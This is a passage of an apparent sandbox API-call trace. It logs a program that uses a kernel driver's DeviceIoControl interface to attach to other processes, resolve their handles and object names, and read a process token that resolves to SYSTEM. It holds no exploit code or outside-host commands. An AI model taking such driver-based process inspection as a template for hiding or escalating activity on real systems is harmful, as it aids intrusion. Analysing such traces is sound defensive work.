[0222.350] PsReleaseProcessExitSynchronization () returned 0x2 [0222.350] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x79 [0222.350] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880052b3508) returned 0x0 [0222.350] ObfDereferenceObject (Object=0xfffffa8003497970) returned 0x1 [0222.350] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.350] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.350] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.350] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0222.350] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.350] PsAcquireProcessExitSynchronization () returned 0x0 [0222.350] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880052b35d0) [0222.350] ObReferenceObjectByHandle (in: Handle=0x104, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003549c80, HandleInformation=0x0) returned 0x0 [0222.350] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.351] PsReleaseProcessExitSynchronization () returned 0x2 [0222.351] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x79 [0222.351] ObQueryNameString (in: Object=0xfffffa8003549c80, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.351] ObfDereferenceObject (Object=0xfffffa8003549c80) returned 0x2 [0222.351] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.351] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.351] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.351] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0222.351] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.351] PsAcquireProcessExitSynchronization () returned 0x0 [0222.351] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880052b35d0) [0222.351] ObReferenceObjectByHandle (in: Handle=0x108, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003695dd0, HandleInformation=0x0) returned 0x0 [0222.351] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.351] PsReleaseProcessExitSynchronization () returned 0x2 [0222.351] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x79 [0222.351] ObQueryNameString (in: Object=0xfffffa8003695dd0, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.905] ObfDereferenceObject (Object=0xfffffa8003695dd0) returned 0x1 [0222.905] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.905] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.905] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.905] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0222.905] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.905] PsAcquireProcessExitSynchronization () returned 0x0 [0222.905] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880052b35d0) [0222.905] ObReferenceObjectByHandle (in: Handle=0x10c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003539a50, HandleInformation=0x0) returned 0x0 [0222.905] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.905] PsReleaseProcessExitSynchronization () returned 0x2 [0222.905] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x79 [0222.905] ObQueryNameString (in: Object=0xfffffa8003539a50, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.905] ObfDereferenceObject (Object=0xfffffa8003539a50) returned 0x1 [0222.905] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.906] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.906] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.906] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0222.906] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.906] PsAcquireProcessExitSynchronization () returned 0x0 [0222.906] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880052b35d0) [0222.906] ObReferenceObjectByHandle (in: Handle=0x2d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034e8070, HandleInformation=0x0) returned 0x0 [0222.906] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.906] PsReleaseProcessExitSynchronization () returned 0x2 [0222.906] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x79 [0222.906] ObQueryNameString (in: Object=0xfffffa80034e8070, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.906] ObfDereferenceObject (Object=0xfffffa80034e8070) returned 0x2 [0222.906] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.906] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.906] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.907] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0222.907] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.907] PsAcquireProcessExitSynchronization () returned 0x0 [0222.907] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880052b35d0) [0222.907] ObReferenceObjectByHandle (in: Handle=0x2d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034f6070, HandleInformation=0x0) returned 0x0 [0222.907] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.907] PsReleaseProcessExitSynchronization () returned 0x2 [0222.907] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x79 [0222.907] ObQueryNameString (in: Object=0xfffffa80034f6070, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.907] ObfDereferenceObject (Object=0xfffffa80034f6070) returned 0x2 [0222.907] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.907] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.907] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.907] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0222.907] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.907] PsAcquireProcessExitSynchronization () returned 0x0 [0222.907] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880052b35d0) [0222.907] ObReferenceObjectByHandle (in: Handle=0x2dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034e3070, HandleInformation=0x0) returned 0x0 [0222.907] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.908] PsReleaseProcessExitSynchronization () returned 0x2 [0222.908] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x79 [0222.908] ObQueryNameString (in: Object=0xfffffa80034e3070, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.908] ObfDereferenceObject (Object=0xfffffa80034e3070) returned 0x2 [0222.908] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.908] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.908] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.908] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0222.908] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.908] PsAcquireProcessExitSynchronization () returned 0x0 [0222.908] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880052b35d0) [0222.908] ObReferenceObjectByHandle (in: Handle=0x2e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034e1070, HandleInformation=0x0) returned 0x0 [0222.908] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.908] PsReleaseProcessExitSynchronization () returned 0x2 [0222.908] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x79 [0222.908] ObQueryNameString (in: Object=0xfffffa80034e1070, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.908] ObfDereferenceObject (Object=0xfffffa80034e1070) returned 0x2 [0222.908] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.908] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.908] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.908] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0222.908] PsLookupProcessByProcessId (in: ProcessId=0x1d8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.908] PsAcquireProcessExitSynchronization () returned 0x0 [0222.909] KeStackAttachProcess (in: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003498b30, ApcState=0xfffff880052b35d0) [0222.909] ObReferenceObjectByHandle (in: Handle=0x2ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034df070, HandleInformation=0x0) returned 0x0 [0222.909] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.909] PsReleaseProcessExitSynchronization () returned 0x2 [0222.909] ObfDereferenceObject (Object=0xfffffa8003498b30) returned 0x79 [0222.909] ObQueryNameString (in: Object=0xfffffa80034df070, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.909] ObfDereferenceObject (Object=0xfffffa80034df070) returned 0x2 [0222.909] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.909] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0xc8 [0222.909] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0222.909] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8003653680, HandleInformation=0x0) returned 0x0 [0222.909] ObOpenObjectByPointer (in: Object=0xfffffa8003653680, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800005bc) returned 0x0 [0222.909] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe1 [0222.909] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800005bc, DesiredAccess=0x8, TokenHandle=0xfffffa800214e680 | out: TokenHandle=0xfffffa800214e680*=0xc4) returned 0x0 [0222.909] ZwClose (Handle=0xffffffff800005bc) returned 0x0 [0222.909] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.909] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0222.909] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0222.912] CloseHandle (hObject=0xc4) returned 1 [0222.912] CloseHandle (hObject=0xc8) returned 1 [0222.912] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.912] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0222.912] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.912] PsAcquireProcessExitSynchronization () returned 0x0 [0222.912] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0) [0222.912] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003573070, HandleInformation=0x0) returned 0x0 [0222.912] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.912] PsReleaseProcessExitSynchronization () returned 0x2 [0222.912] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xdf [0222.912] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880052b3508) returned 0x0 [0222.912] ObfDereferenceObject (Object=0xfffffa8003573070) returned 0x1 [0222.912] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.912] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.912] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.912] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0222.912] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.912] PsAcquireProcessExitSynchronization () returned 0x0 [0222.912] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0) [0222.912] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000a07620, HandleInformation=0x0) returned 0x0 [0222.912] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.913] PsReleaseProcessExitSynchronization () returned 0x2 [0222.913] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xdf [0222.913] ObQueryNameString (in: Object=0xfffff8a000a07620, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.913] ObfDereferenceObject (Object=0xfffff8a000a07620) returned 0x2 [0222.913] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.913] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.913] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.913] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x28, lpOverlapped=0x0) returned 1 [0222.913] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.913] PsAcquireProcessExitSynchronization () returned 0x0 [0222.913] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0) [0222.913] ObReferenceObjectByHandle (in: Handle=0x88, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a004473aa0, HandleInformation=0x0) returned 0x0 [0222.913] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.913] PsReleaseProcessExitSynchronization () returned 0x2 [0222.913] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xdf [0222.913] ObQueryNameString (in: Object=0xfffff8a004473aa0, ObjectNameInfo=0xfffffa800307c044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307c044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.913] ObfDereferenceObject (Object=0xfffff8a004473aa0) returned 0x2 [0222.913] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.913] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.913] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.913] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0222.913] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.913] PsAcquireProcessExitSynchronization () returned 0x0 [0222.913] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0) [0222.913] ObReferenceObjectByHandle (in: Handle=0xa0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800bd6c500, HandleInformation=0x0) returned 0x0 [0222.913] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.913] PsReleaseProcessExitSynchronization () returned 0x2 [0222.913] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xdf [0222.913] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0222.913] ObfDereferenceObject (Object=0xfffffa800bd6c500) returned 0x1 [0222.913] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.914] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.914] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.914] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0222.914] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.914] PsAcquireProcessExitSynchronization () returned 0x0 [0222.914] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0) [0222.914] ObReferenceObjectByHandle (in: Handle=0x1a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036b9f20, HandleInformation=0x0) returned 0x0 [0222.914] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.914] PsReleaseProcessExitSynchronization () returned 0x2 [0222.914] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xdf [0222.914] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880052b3508) returned 0x0 [0222.914] ObfDereferenceObject (Object=0xfffffa80036b9f20) returned 0x1 [0222.914] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.914] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.914] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.914] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0222.914] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.914] PsAcquireProcessExitSynchronization () returned 0x0 [0222.914] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0) [0222.914] ObReferenceObjectByHandle (in: Handle=0x1b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000a2b240, HandleInformation=0x0) returned 0x0 [0222.914] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.914] PsReleaseProcessExitSynchronization () returned 0x2 [0222.914] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xdf [0222.914] ObQueryNameString (in: Object=0xfffff8a000a2b240, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.914] ObfDereferenceObject (Object=0xfffff8a000a2b240) returned 